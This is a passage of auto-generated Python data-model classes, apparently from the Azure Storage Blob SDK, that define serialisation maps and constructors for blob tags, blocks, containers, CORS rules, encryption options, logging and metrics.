self.remaining_retention_days = kwargs.get('remaining_retention_days', None)
self.access_tier = kwargs.get('access_tier', None)
self.access_tier_inferred = kwargs.get('access_tier_inferred', None)
self.archive_status = kwargs.get('archive_status', None)
self.customer_provided_key_sha256 = kwargs.get('customer_provided_key_sha256', None)
self.encryption_scope = kwargs.get('encryption_scope', None)
self.access_tier_change_time = kwargs.get('access_tier_change_time', None)
self.tag_count = kwargs.get('tag_count', None)
self.expires_on = kwargs.get('expires_on', None)
self.is_sealed = kwargs.get('is_sealed', None)
self.rehydrate_priority = kwargs.get('rehydrate_priority', None)
class BlobTag(Model):
"""BlobTag.
All required parameters must be populated in order to send to Azure.
:param key: Required.
:type key: str
:param value: Required.
:type value: str
"""
_validation = {
'key': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'key': {'key': 'Key', 'type': 'str', 'xml': {'name': 'Key'}},
'value': {'key': 'Value', 'type': 'str', 'xml': {'name': 'Value'}},
}
_xml_map = {
'name': 'Tag'
}
def __init__(self, **kwargs):
super(BlobTag, self).__init__(**kwargs)
self.key = kwargs.get('key', None)
self.value = kwargs.get('value', None)
class BlobTags(Model):
"""Blob tags.
All required parameters must be populated in order to send to Azure.
:param blob_tag_set: Required.
:type blob_tag_set: list[~azure.storage.blob.models.BlobTag]
"""
_validation = {
'blob_tag_set': {'required': True},
}
_attribute_map = {
'blob_tag_set': {'key': 'BlobTagSet', 'type': '[BlobTag]', 'xml': {'name': 'TagSet', 'itemsName': 'TagSet', 'wrapped': True}},
}
_xml_map = {
'name': 'Tags'
}
def __init__(self, **kwargs):
super(BlobTags, self).__init__(**kwargs)
self.blob_tag_set = kwargs.get('blob_tag_set', None)
class Block(Model):
"""Represents a single block in a block blob. It describes the block's ID and
size.
All required parameters must be populated in order to send to Azure.
:param name: Required. The base64 encoded block ID.
:type name: str
:param size: Required. The block size in bytes.
:type size: int
"""
_validation = {
'name': {'required': True},
'size': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
'size': {'key': 'Size', 'type': 'int', 'xml': {'name': 'Size'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(Block, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.size = kwargs.get('size', None)
class BlockList(Model):
"""BlockList.
:param committed_blocks:
:type committed_blocks: list[~azure.storage.blob.models.Block]
:param uncommitted_blocks:
:type uncommitted_blocks: list[~azure.storage.blob.models.Block]
"""
_attribute_map = {
'committed_blocks': {'key': 'CommittedBlocks', 'type': '[Block]', 'xml': {'name': 'CommittedBlocks', 'itemsName': 'Block', 'wrapped': True}},
'uncommitted_blocks': {'key': 'UncommittedBlocks', 'type': '[Block]', 'xml': {'name': 'UncommittedBlocks', 'itemsName': 'Block', 'wrapped': True}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(BlockList, self).__init__(**kwargs)
self.committed_blocks = kwargs.get('committed_blocks', None)
self.uncommitted_blocks = kwargs.get('uncommitted_blocks', None)
class BlockLookupList(Model):
"""BlockLookupList.
:param committed:
:type committed: list[str]
:param uncommitted:
:type uncommitted: list[str]
:param latest:
:type latest: list[str]
"""
_attribute_map = {
'committed': {'key': 'Committed', 'type': '[str]', 'xml': {'name': 'Committed', 'itemsName': 'Committed'}},
'uncommitted': {'key': 'Uncommitted', 'type': '[str]', 'xml': {'name': 'Uncommitted', 'itemsName': 'Uncommitted'}},
'latest': {'key': 'Latest', 'type': '[str]', 'xml': {'name': 'Latest', 'itemsName': 'Latest'}},
}
_xml_map = {
'name': 'BlockList'
}
def __init__(self, **kwargs):
super(BlockLookupList, self).__init__(**kwargs)
self.committed = kwargs.get('committed', None)
self.uncommitted = kwargs.get('uncommitted', None)
self.latest = kwargs.get('latest', None)
class ClearRange(Model):
"""ClearRange.
All required parameters must be populated in order to send to Azure.
:param start: Required.
:type start: long
:param end: Required.
:type end: long
"""
_validation = {
'start': {'required': True},
'end': {'required': True},
}
_attribute_map = {
'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}},
'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}},
}
_xml_map = {
'name': 'ClearRange'
}
def __init__(self, **kwargs):
super(ClearRange, self).__init__(**kwargs)
self.start = kwargs.get('start', None)
self.end = kwargs.get('end', None)
class ContainerCpkScopeInfo(Model):
"""Additional parameters for create operation.
:param default_encryption_scope: Optional. Version 2019-07-07 and later.
Specifies the default encryption scope to set on the container and use for
all future writes.
:type default_encryption_scope: str
:param prevent_encryption_scope_override: Optional. Version 2019-07-07
and newer. If true, prevents any request from specifying a different
encryption scope than the scope set on the container.
:type prevent_encryption_scope_override: bool
"""
_attribute_map = {
'default_encryption_scope': {'key': '', 'type': 'str', 'xml': {'name': 'default_encryption_scope'}},
'prevent_encryption_scope_override': {'key': '', 'type': 'bool', 'xml': {'name': 'prevent_encryption_scope_override'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(ContainerCpkScopeInfo, self).__init__(**kwargs)
self.default_encryption_scope = kwargs.get('default_encryption_scope', None)
self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', None)
class ContainerItem(Model):
"""An Azure Storage container.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
:param deleted:
:type deleted: bool
:param version:
:type version: str
:param properties: Required.
:type properties: ~azure.storage.blob.models.ContainerProperties
:param metadata:
:type metadata: dict[str, str]
"""
_validation = {
'name': {'required': True},
'properties': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
'deleted': {'key': 'Deleted', 'type': 'bool', 'xml': {'name': 'Deleted'}},
'version': {'key': 'Version', 'type': 'str', 'xml': {'name': 'Version'}},
'properties': {'key': 'Properties', 'type': 'ContainerProperties', 'xml': {'name': 'Properties'}},
'metadata': {'key': 'Metadata', 'type': '{str}', 'xml': {'name': 'Metadata'}},
}
_xml_map = {
'name': 'Container'
}
def __init__(self, **kwargs):
super(ContainerItem, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.deleted = kwargs.get('deleted', None)
self.version = kwargs.get('version', None)
self.properties = kwargs.get('properties', None)
self.metadata = kwargs.get('metadata', None)
class ContainerProperties(Model):
"""Properties of a container.
All required parameters must be populated in order to send to Azure.
:param last_modified: Required.
:type last_modified: datetime
:param etag: Required.
:type etag: str
:param lease_status: Possible values include: 'locked', 'unlocked'
:type lease_status: str or ~azure.storage.blob.models.LeaseStatusType
:param lease_state: Possible values include: 'available', 'leased',
'expired', 'breaking', 'broken'
:type lease_state: str or ~azure.storage.blob.models.LeaseStateType
:param lease_duration: Possible values include: 'infinite', 'fixed'
:type lease_duration: str or ~azure.storage.blob.models.LeaseDurationType
:param public_access: Possible values include: 'container', 'blob'
:type public_access: str or ~azure.storage.blob.models.PublicAccessType
:param has_immutability_policy:
:type has_immutability_policy: bool
:param has_legal_hold:
:type has_legal_hold: bool
:param default_encryption_scope:
:type default_encryption_scope: str
:param prevent_encryption_scope_override:
:type prevent_encryption_scope_override: bool
:param deleted_time:
:type deleted_time: datetime
:param remaining_retention_days:
:type remaining_retention_days: int
"""
_validation = {
'last_modified': {'required': True},
'etag': {'required': True},
}
_attribute_map = {
'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123', 'xml': {'name': 'Last-Modified'}},
'etag': {'key': 'Etag', 'type': 'str', 'xml': {'name': 'Etag'}},
'lease_status': {'key': 'LeaseStatus', 'type': 'LeaseStatusType', 'xml': {'name': 'LeaseStatus'}},
'lease_state': {'key': 'LeaseState', 'type': 'LeaseStateType', 'xml': {'name': 'LeaseState'}},
'lease_duration': {'key': 'LeaseDuration', 'type': 'LeaseDurationType', 'xml': {'name': 'LeaseDuration'}},
'public_access': {'key': 'PublicAccess', 'type': 'str', 'xml': {'name': 'PublicAccess'}},
'has_immutability_policy': {'key': 'HasImmutabilityPolicy', 'type': 'bool', 'xml': {'name': 'HasImmutabilityPolicy'}},
'has_legal_hold': {'key': 'HasLegalHold', 'type': 'bool', 'xml': {'name': 'HasLegalHold'}},
'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str', 'xml': {'name': 'DefaultEncryptionScope'}},
'prevent_encryption_scope_override': {'key': 'DenyEncryptionScopeOverride', 'type': 'bool', 'xml': {'name': 'DenyEncryptionScopeOverride'}},
'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123', 'xml': {'name': 'DeletedTime'}},
'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int', 'xml': {'name': 'RemainingRetentionDays'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(ContainerProperties, self).__init__(**kwargs)
self.last_modified = kwargs.get('last_modified', None)
self.etag = kwargs.get('etag', None)
self.lease_status = kwargs.get('lease_status', None)
self.lease_state = kwargs.get('lease_state', None)
self.lease_duration = kwargs.get('lease_duration', None)
self.public_access = kwargs.get('public_access', None)
self.has_immutability_policy = kwargs.get('has_immutability_policy', None)
self.has_legal_hold = kwargs.get('has_legal_hold', None)
self.default_encryption_scope = kwargs.get('default_encryption_scope', None)
self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', None)
self.deleted_time = kwargs.get('deleted_time', None)
self.remaining_retention_days = kwargs.get('remaining_retention_days', None)
class CorsRule(Model):
"""CORS is an HTTP feature that enables a web application running under one
domain to access resources in another domain. Web browsers implement a
security restriction known as same-origin policy that prevents a web page
from calling APIs in a different domain; CORS provides a secure way to
allow one domain (the origin domain) to call APIs in another domain.
All required parameters must be populated in order to send to Azure.
:param allowed_origins: Required. The origin domains that are permitted to
make a request against the storage service via CORS. The origin domain is
the domain from which the request originates. Note that the origin must be
an exact case-sensitive match with the origin that the user age sends to
the service. You can also use the wildcard character '*' to allow all
origin domains to make requests via CORS.
:type allowed_origins: str
:param allowed_methods: Required. The methods (HTTP request verbs) that
the origin domain may use for a CORS request. (comma separated)
:type allowed_methods: str
:param allowed_headers: Required. the request headers that the origin
domain may specify on the CORS request.
:type allowed_headers: str
:param exposed_headers: Required. The response headers that may be sent in
the response to the CORS request and exposed by the browser to the request
issuer
:type exposed_headers: str
:param max_age_in_seconds: Required. The maximum amount time that a
browser should cache the preflight OPTIONS request.
:type max_age_in_seconds: int
"""
_validation = {
'allowed_origins': {'required': True},
'allowed_methods': {'required': True},
'allowed_headers': {'required': True},
'exposed_headers': {'required': True},
'max_age_in_seconds': {'required': True, 'minimum': 0},
}
_attribute_map = {
'allowed_origins': {'key': 'AllowedOrigins', 'type': 'str', 'xml': {'name': 'AllowedOrigins'}},
'allowed_methods': {'key': 'AllowedMethods', 'type': 'str', 'xml': {'name': 'AllowedMethods'}},
'allowed_headers': {'key': 'AllowedHeaders', 'type': 'str', 'xml': {'name': 'AllowedHeaders'}},
'exposed_headers': {'key': 'ExposedHeaders', 'type': 'str', 'xml': {'name': 'ExposedHeaders'}},
'max_age_in_seconds': {'key': 'MaxAgeInSeconds', 'type': 'int', 'xml': {'name': 'MaxAgeInSeconds'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(CorsRule, self).__init__(**kwargs)
self.allowed_origins = kwargs.get('allowed_origins', None)
self.allowed_methods = kwargs.get('allowed_methods', None)
self.allowed_headers = kwargs.get('allowed_headers', None)
self.exposed_headers = kwargs.get('exposed_headers', None)
self.max_age_in_seconds = kwargs.get('max_age_in_seconds', None)
class CpkInfo(Model):
"""Additional parameters for a set of operations.
:param encryption_key: Optional. Specifies the encryption key to use to
encrypt the data provided in the request. If not specified, encryption is
performed with the root account encryption key. For more information, see
Encryption at Rest for Azure Storage Services.
:type encryption_key: str
:param encryption_key_sha256: The SHA-256 hash of the provided encryption
key. Must be provided if the x-ms-encryption-key header is provided.
:type encryption_key_sha256: str
:param encryption_algorithm: The algorithm used to produce the encryption
key hash. Currently, the only accepted value is "AES256". Must be provided
if the x-ms-encryption-key header is provided. Possible values include:
'AES256'
:type encryption_algorithm: str or
~azure.storage.blob.models.EncryptionAlgorithmType
"""
_attribute_map = {
'encryption_key': {'key': '', 'type': 'str', 'xml': {'name': 'encryption_key'}},
'encryption_key_sha256': {'key': '', 'type': 'str', 'xml': {'name': 'encryption_key_sha256'}},
'encryption_algorithm': {'key': '', 'type': 'EncryptionAlgorithmType', 'xml': {'name': 'encryption_algorithm'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(CpkInfo, self).__init__(**kwargs)
self.encryption_key = kwargs.get('encryption_key', None)
self.encryption_key_sha256 = kwargs.get('encryption_key_sha256', None)
self.encryption_algorithm = kwargs.get('encryption_algorithm', None)
class CpkScopeInfo(Model):
"""Additional parameters for a set of operations.
:param encryption_scope: Optional. Version 2019-07-07 and later.
Specifies the name of the encryption scope to use to encrypt the data
provided in the request. If not specified, encryption is performed with
the default account encryption scope. For more information, see
Encryption at Rest for Azure Storage Services.
:type encryption_scope: str
"""
_attribute_map = {
'encryption_scope': {'key': '', 'type': 'str', 'xml': {'name': 'encryption_scope'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(CpkScopeInfo, self).__init__(**kwargs)
self.encryption_scope = kwargs.get('encryption_scope', None)
class DataLakeStorageError(Model):
"""DataLakeStorageError.
:param data_lake_storage_error_details: The service error response object.
:type data_lake_storage_error_details:
~azure.storage.blob.models.DataLakeStorageErrorError
"""
_attribute_map = {
'data_lake_storage_error_details': {'key': 'error', 'type': 'DataLakeStorageErrorError', 'xml': {'name': 'error'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(DataLakeStorageError, self).__init__(**kwargs)
self.data_lake_storage_error_details = kwargs.get('data_lake_storage_error_details', None)
class DataLakeStorageErrorException(HttpResponseError):
"""Server responsed with exception of type: 'DataLakeStorageError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, response, deserialize, *args):
model_name = 'DataLakeStorageError'
self.error = deserialize(model_name, response)
if self.error is None:
self.error = deserialize.dependencies[model_name]()
super(DataLakeStorageErrorException, self).__init__(response=response)
class DataLakeStorageErrorError(Model):
"""The service error response object.
:param code: The service error code.
:type code: str
:param message: The service error message.
:type message: str
"""
_attribute_map = {
'code': {'key': 'Code', 'type': 'str', 'xml': {'name': 'Code'}},
'message': {'key': 'Message', 'type': 'str', 'xml': {'name': 'Message'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(DataLakeStorageErrorError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class DelimitedTextConfiguration(Model):
"""delimited text configuration.
All required parameters must be populated in order to send to Azure.
:param column_separator: Required. column separator
:type column_separator: str
:param field_quote: Required. field quote
:type field_quote: str
:param record_separator: Required. record separator
:type record_separator: str
:param escape_char: Required. escape char
:type escape_char: str
:param headers_present: Required. has headers
:type headers_present: bool
"""
_validation = {
'column_separator': {'required': True},
'field_quote': {'required': True},
'record_separator': {'required': True},
'escape_char': {'required': True},
'headers_present': {'required': True},
}
_attribute_map = {
'column_separator': {'key': 'ColumnSeparator', 'type': 'str', 'xml': {'name': 'ColumnSeparator'}},
'field_quote': {'key': 'FieldQuote', 'type': 'str', 'xml': {'name': 'FieldQuote'}},
'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}},
'escape_char': {'key': 'EscapeChar', 'type': 'str', 'xml': {'name': 'EscapeChar'}},
'headers_present': {'key': 'HeadersPresent', 'type': 'bool', 'xml': {'name': 'HasHeaders'}},
}
_xml_map = {
'name': 'DelimitedTextConfiguration'
}
def __init__(self, **kwargs):
super(DelimitedTextConfiguration, self).__init__(**kwargs)
self.column_separator = kwargs.get('column_separator', None)
self.field_quote = kwargs.get('field_quote', None)
self.record_separator = kwargs.get('record_separator', None)
self.escape_char = kwargs.get('escape_char', None)
self.headers_present = kwargs.get('headers_present', None)
class DirectoryHttpHeaders(Model):
"""Additional parameters for a set of operations, such as: Directory_create,
Directory_rename, Blob_rename.
:param cache_control: Cache control for given resource
:type cache_control: str
:param content_type: Content type for given resource
:type content_type: str
:param content_encoding: Content encoding for given resource
:type content_encoding: str
:param content_language: Content language for given resource
:type content_language: str
:param content_disposition: Content disposition for given resource
:type content_disposition: str
"""
_attribute_map = {
'cache_control': {'key': '', 'type': 'str', 'xml': {'name': 'cache_control'}},
'content_type': {'key': '', 'type': 'str', 'xml': {'name': 'content_type'}},
'content_encoding': {'key': '', 'type': 'str', 'xml': {'name': 'content_encoding'}},
'content_language': {'key': '', 'type': 'str', 'xml': {'name': 'content_language'}},
'content_disposition': {'key': '', 'type': 'str', 'xml': {'name': 'content_disposition'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(DirectoryHttpHeaders, self).__init__(**kwargs)
self.cache_control = kwargs.get('cache_control', None)
self.content_type = kwargs.get('content_type', None)
self.content_encoding = kwargs.get('content_encoding', None)
self.content_language = kwargs.get('content_language', None)
self.content_disposition = kwargs.get('content_disposition', None)
class FilterBlobItem(Model):
"""Blob info from a Filter Blobs API call.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
:param container_name: Required.
:type container_name: str
:param tag_value: Required.
:type tag_value: str
"""
_validation = {
'name': {'required': True},
'container_name': {'required': True},
'tag_value': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'name': 'ContainerName'}},
'tag_value': {'key': 'TagValue', 'type': 'str', 'xml': {'name': 'TagValue'}},
}
_xml_map = {
'name': 'Blob'
}
def __init__(self, **kwargs):
super(FilterBlobItem, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.container_name = kwargs.get('container_name', None)
self.tag_value = kwargs.get('tag_value', None)
class FilterBlobSegment(Model):
"""The result of a Filter Blobs API call.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param where: Required.
:type where: str
:param blobs: Required.
:type blobs: list[~azure.storage.blob.models.FilterBlobItem]
:param next_marker:
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'where': {'required': True},
'blobs': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'name': 'ServiceEndpoint', 'attr': True}},
'where': {'key': 'Where', 'type': 'str', 'xml': {'name': 'Where'}},
'blobs': {'key': 'Blobs', 'type': '[FilterBlobItem]', 'xml': {'name': 'Blobs', 'itemsName': 'Blobs', 'wrapped': True}},
'next_marker': {'key': 'NextMarker', 'type': 'str', 'xml': {'name': 'NextMarker'}},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(self, **kwargs):
super(FilterBlobSegment, self).__init__(**kwargs)
self.service_endpoint = kwargs.get('service_endpoint', None)
self.where = kwargs.get('where', None)
self.blobs = kwargs.get('blobs', None)
self.next_marker = kwargs.get('next_marker', None)
class GeoReplication(Model):
"""Geo-Replication information for the Secondary Storage Service.
All required parameters must be populated in order to send to Azure.
:param status: Required. The status of the secondary location. Possible
values include: 'live', 'bootstrap', 'unavailable'
:type status: str or ~azure.storage.blob.models.GeoReplicationStatusType
:param last_sync_time: Required. A GMT date/time value, to the second. All
primary writes preceding this value are guaranteed to be available for
read operations at the secondary. Primary writes after this point in time
may or may not be available for reads.
:type last_sync_time: datetime
"""
_validation = {
'status': {'required': True},
'last_sync_time': {'required': True},
}
_attribute_map = {
'status': {'key': 'Status', 'type': 'str', 'xml': {'name': 'Status'}},
'last_sync_time': {'key': 'LastSyncTime', 'type': 'rfc-1123', 'xml': {'name': 'LastSyncTime'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(GeoReplication, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.last_sync_time = kwargs.get('last_sync_time', None)
class JsonTextConfiguration(Model):
"""json text configuration.
All required parameters must be populated in order to send to Azure.
:param record_separator: Required. record separator
:type record_separator: str
"""
_validation = {
'record_separator': {'required': True},
}
_attribute_map = {
'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}},
}
_xml_map = {
'name': 'JsonTextConfiguration'
}
def __init__(self, **kwargs):
super(JsonTextConfiguration, self).__init__(**kwargs)
self.record_separator = kwargs.get('record_separator', None)
class KeyInfo(Model):
"""Key information.
All required parameters must be populated in order to send to Azure.
:param start: Required. The date-time the key is active in ISO 8601 UTC
time
:type start: str
:param expiry: Required. The date-time the key expires in ISO 8601 UTC
time
:type expiry: str
"""
_validation = {
'start': {'required': True},
'expiry': {'required': True},
}
_attribute_map = {
'start': {'key': 'Start', 'type': 'str', 'xml': {'name': 'Start'}},
'expiry': {'key': 'Expiry', 'type': 'str', 'xml': {'name': 'Expiry'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(KeyInfo, self).__init__(**kwargs)
self.start = kwargs.get('start', None)
self.expiry = kwargs.get('expiry', None)
class LeaseAccessConditions(Model):
"""Additional parameters for a set of operations.
:param lease_id: If specified, the operation only succeeds if the
resource's lease is active and matches this ID.
:type lease_id: str
"""
_attribute_map = {
'lease_id': {'key': '', 'type': 'str', 'xml': {'name': 'lease_id'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(LeaseAccessConditions, self).__init__(**kwargs)
self.lease_id = kwargs.get('lease_id', None)
class ListBlobsFlatSegmentResponse(Model):
"""An enumeration of blobs.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param container_name: Required.
:type container_name: str
:param prefix:
:type prefix: str
:param marker:
:type marker: str
:param max_results:
:type max_results: int
:param segment: Required.
:type segment: ~azure.storage.blob.models.BlobFlatListSegment
:param next_marker:
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'container_name': {'required': True},
'segment': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'name': 'ServiceEndpoint', 'attr': True}},
'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'name': 'ContainerName', 'attr': True}},
'prefix': {'key': 'Prefix', 'type': 'str', 'xml': {'name': 'Prefix'}},
'marker': {'key': 'Marker', 'type': 'str', 'xml': {'name': 'Marker'}},
'max_results': {'key': 'MaxResults', 'type': 'int', 'xml': {'name': 'MaxResults'}},
'segment': {'key': 'Segment', 'type': 'BlobFlatListSegment', 'xml': {'name': 'Segment'}},
'next_marker': {'key': 'NextMarker', 'type': 'str', 'xml': {'name': 'NextMarker'}},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(self, **kwargs):
super(ListBlobsFlatSegmentResponse, self).__init__(**kwargs)
self.service_endpoint = kwargs.get('service_endpoint', None)
self.container_name = kwargs.get('container_name', None)
self.prefix = kwargs.get('prefix', None)
self.marker = kwargs.get('marker', None)
self.max_results = kwargs.get('max_results', None)
self.segment = kwargs.get('segment', None)
self.next_marker = kwargs.get('next_marker', None)
class ListBlobsHierarchySegmentResponse(Model):
"""An enumeration of blobs.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param container_name: Required.
:type container_name: str
:param prefix:
:type prefix: str
:param marker:
:type marker: str
:param max_results:
:type max_results: int
:param delimiter:
:type delimiter: str
:param segment: Required.
:type segment: ~azure.storage.blob.models.BlobHierarchyListSegment
:param next_marker:
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'container_name': {'required': True},
'segment': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'name': 'ServiceEndpoint', 'attr': True}},
'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'name': 'ContainerName', 'attr': True}},
'prefix': {'key': 'Prefix', 'type': 'str', 'xml': {'name': 'Prefix'}},
'marker': {'key': 'Marker', 'type': 'str', 'xml': {'name': 'Marker'}},
'max_results': {'key': 'MaxResults', 'type': 'int', 'xml': {'name': 'MaxResults'}},
'delimiter': {'key': 'Delimiter', 'type': 'str', 'xml': {'name': 'Delimiter'}},
'segment': {'key': 'Segment', 'type': 'BlobHierarchyListSegment', 'xml': {'name': 'Segment'}},
'next_marker': {'key': 'NextMarker', 'type': 'str', 'xml': {'name': 'NextMarker'}},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(self, **kwargs):
super(ListBlobsHierarchySegmentResponse, self).__init__(**kwargs)
self.service_endpoint = kwargs.get('service_endpoint', None)
self.container_name = kwargs.get('container_name', None)
self.prefix = kwargs.get('prefix', None)
self.marker = kwargs.get('marker', None)
self.max_results = kwargs.get('max_results', None)
self.delimiter = kwargs.get('delimiter', None)
self.segment = kwargs.get('segment', None)
self.next_marker = kwargs.get('next_marker', None)
class ListContainersSegmentResponse(Model):
"""An enumeration of containers.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param prefix:
:type prefix: str
:param marker:
:type marker: str
:param max_results:
:type max_results: int
:param container_items: Required.
:type container_items: list[~azure.storage.blob.models.ContainerItem]
:param next_marker:
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'container_items': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'name': 'ServiceEndpoint', 'attr': True}},
'prefix': {'key': 'Prefix', 'type': 'str', 'xml': {'name': 'Prefix'}},
'marker': {'key': 'Marker', 'type': 'str', 'xml': {'name': 'Marker'}},
'max_results': {'key': 'MaxResults', 'type': 'int', 'xml': {'name': 'MaxResults'}},
'container_items': {'key': 'ContainerItems', 'type': '[ContainerItem]', 'xml': {'name': 'Containers', 'itemsName': 'Containers', 'wrapped': True}},
'next_marker': {'key': 'NextMarker', 'type': 'str', 'xml': {'name': 'NextMarker'}},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(self, **kwargs):
super(ListContainersSegmentResponse, self).__init__(**kwargs)
self.service_endpoint = kwargs.get('service_endpoint', None)
self.prefix = kwargs.get('prefix', None)
self.marker = kwargs.get('marker', None)
self.max_results = kwargs.get('max_results', None)
self.container_items = kwargs.get('container_items', None)
self.next_marker = kwargs.get('next_marker', None)
class Logging(Model):
"""Azure Analytics Logging settings.
All required parameters must be populated in order to send to Azure.
:param version: Required. The version of Storage Analytics to configure.
:type version: str
:param delete: Required. Indicates whether all delete requests should be
logged.
:type delete: bool
:param read: Required. Indicates whether all read requests should be
logged.
:type read: bool
:param write: Required. Indicates whether all write requests should be
logged.
:type write: bool
:param retention_policy: Required.
:type retention_policy: ~azure.storage.blob.models.RetentionPolicy
"""
_validation = {
'version': {'required': True},
'delete': {'required': True},
'read': {'required': True},
'write': {'required': True},
'retention_policy': {'required': True},
}
_attribute_map = {
'version': {'key': 'Version', 'type': 'str', 'xml': {'name': 'Version'}},
'delete': {'key': 'Delete', 'type': 'bool', 'xml': {'name': 'Delete'}},
'read': {'key': 'Read', 'type': 'bool', 'xml': {'name': 'Read'}},
'write': {'key': 'Write', 'type': 'bool', 'xml': {'name': 'Write'}},
'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy', 'xml': {'name': 'RetentionPolicy'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(Logging, self).__init__(**kwargs)
self.version = kwargs.get('version', None)
self.delete = kwargs.get('delete', None)
self.read = kwargs.get('read', None)
self.write = kwargs.get('write', None)
self.retention_policy = kwargs.get('retention_policy', None)
class Metrics(Model):
"""a summary of request statistics grouped by API in hour or minute aggregates
for blobs.
All required parameters must be populated in order to send to Azure.
:param version: The version of Storage Analytics to configure.
:type version: str
:param enabled: Required. Indicates whether metrics are enabled for the
Blob service.
:type enabled: bool
:param include_apis: Indicates whether metrics should generate summary
statistics for called API operations.
:type include_apis: bool
:param retention_policy:
:type retention_policy: ~azure.storage.blob.models.RetentionPolicy
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'version': {'key': 'Version', 'type': 'str', 'xml': {'name': 'Version'}},
'enabled': {'key': 'Enabled', 'type': 'bool', 'xml': {'name': 'Enabled'}},
'include_apis': {'key': 'IncludeAPIs', 'type': 'bool', 'xml': {'name': 'IncludeAPIs'}},
'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy', 'xml': {'name': 'RetentionPolicy'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(Metrics, self).__init__(**kwargs)
self.version = kwargs.get('version', None)
self.enabled = kwargs.get('enabled', None)
self.include_apis = kwargs.get('include_apis', None)
self.retention_policy = kwargs.get('retention_policy', None)
class ModifiedAccessConditions(Model):
"""Additional parameters for a set of operations.
:param if_modified_since: Specify this header value to operate only on a
blob if it has been modified since the specified date/time.
:type if_modified_since: datetime
:param if_unmodified_since: Specify this header value to operate only on a
blob if it has not been modified since the specified date/time.
:type if_unmodified_since: datetime
:param if_match: Specify an ETag value to operate only on blobs with a
matching value.
:type if_match: str
:param if_none_match: Specify an ETag value to operate only on blobs
without a matching value.
:type if_none_match: str
:param if_tags: Specify a SQL where clause on blob tags to operate only on
blobs with a matching value.
:type if_tags: str
"""
_attribute_map = {
'if_modified_since': {'key': '', 'type': 'rfc-1123', 'xml': {'name': 'if_modified_since'}},
'if_unmodified_since': {'key': '', 'type': 'rfc-1123', 'xml': {'name': 'if_unmodified_since'}},
'if_match': {'key': '', 'type': 'str', 'xml': {'name': 'if_match'}},
'if_none_match': {'key': '', 'type': 'str', 'xml': {'name': 'if_none_match'}},
'if_tags': {'key': '', 'type': 'str', 'xml': {'name': 'if_tags'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(ModifiedAccessConditions, self).__init__(**kwargs)
self.if_modified_since = kwargs.get('if_modified_since', None)
self.if_unmodified_since = kwargs.get('if_unmodified_since', None)
self.if_match = kwargs.get('if_match', None)
self.if_none_match = kwargs.get('if_none_match', None)
self.if_tags = kwargs.get('if_tags', None)
class PageList(Model):
"""the list of pages.
:param page_range:
